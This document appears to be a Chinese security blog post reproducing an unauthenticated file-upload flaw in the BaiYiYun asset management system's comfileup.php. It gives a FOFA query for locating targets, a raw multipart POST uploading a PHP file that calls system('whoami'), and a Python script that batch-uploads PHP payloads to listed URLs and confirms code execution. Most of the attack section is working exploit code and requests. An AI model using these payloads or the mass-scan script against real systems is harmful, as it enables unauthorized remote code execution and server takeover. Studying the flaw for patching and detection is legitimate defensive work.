百易云资产管理运营系统 comfileup.php 接口存在文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
FOFA:
body="不要着急,点此
无
POST /comfileup.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Content-Type: multipart/form-data; boundary=--------1110146050
----------1110146050
Content-Disposition: form-data; name="file";filename="test.php"
<?php system("whoami");unlink(__FILE__);?>
----------1110146050--
拼接路径后访问会出现24642数字
# encoding:utf-8
import time
import requests
import argparse
import ssl
import urllib3
import re
import json
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning
# ssl._create_unverified_context:创建一个 SSL 上下文,用于处理 HTTPS 请求时不验证服务器证书的情况。
ssl._create_default_https_context = ssl._create_unverified_context
# urllib3.disable_warnings():禁用 urllib3 库的不安全请求警告,即不显示由于不安全的 HTTPS 请求而引发的警告信息。
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 打印颜色
RED = '�33[31m'
GREEN = '�33[32m'
RESET = '�33[0m'
def check_vuln(url):
url = url.strip("/")
target = url + "/comfileup.php"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
'Content-Type': 'multipart/form-data; boundary=--------1110146050'
}
headers1 = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/58.0.3029.110 Safari/537.3'
}
data = """----------1110146050rnContent-Disposition: form-data; name="file";filename="test.php"rnrn<?php
print(111*222);unlink(__FILE__);?>rn----------1110146050--"""
try:
response = requests.post(target, headers=headers, data=data, verify=False, timeout=20)
if response.status_code == 200 and 'fname' in response.text and '"vpath":"/uploads/' in response.text:
response_data = json.loads(response.text)
vpath_value = response_data['vpath']
clean_vpath = re.sub(r'\/', '/', vpath_value)
res_url = url + clean_vpath
result_response = requests.get(res_url, headers=headers1, verify=False, timeout=20)
if result_response.status_code == 200 and '24642' in result_response.text:
print(f"{RED}[+] {url} 存在任意文件上传漏洞,上传地址为:{res_url}{RESET}")
else:
print(f"{GREEN}[-] {url} 不存在任意文件上传漏洞{RESET}")
return True
else:
pass
except Exception as e:
pass
def main():
parser = argparse.ArgumentParser(description="文件上传漏洞检测脚本")
parser.add_argument("-u", "--url", help="目标URL")
parser.add_argument("-f", "--file", help="目标URL列表文件")
args = parser.parse_args()
if args.url:
url = "http://" + args.url if not args.url.startswith(("http://", "https://")) else args.url
check_vuln(url)
elif args.file:
with open(args.file, "r") as f:
urls = f.read().splitlines()
for url in urls:
url = "http://" + url if not url.startswith(("http://", "https://")) else url
check_vuln(url)
if __name__ == "__main__":
main()
python .BaiYiYun-comfileup-Fileupload.py -f .1.txt
python .BaiYiYun-comfileup-Fileupload.py -u 192.168.1.1
原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】百易云资产管理运营系统 comfileup.php 任意文件上传漏洞 (附批量验证脚本)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论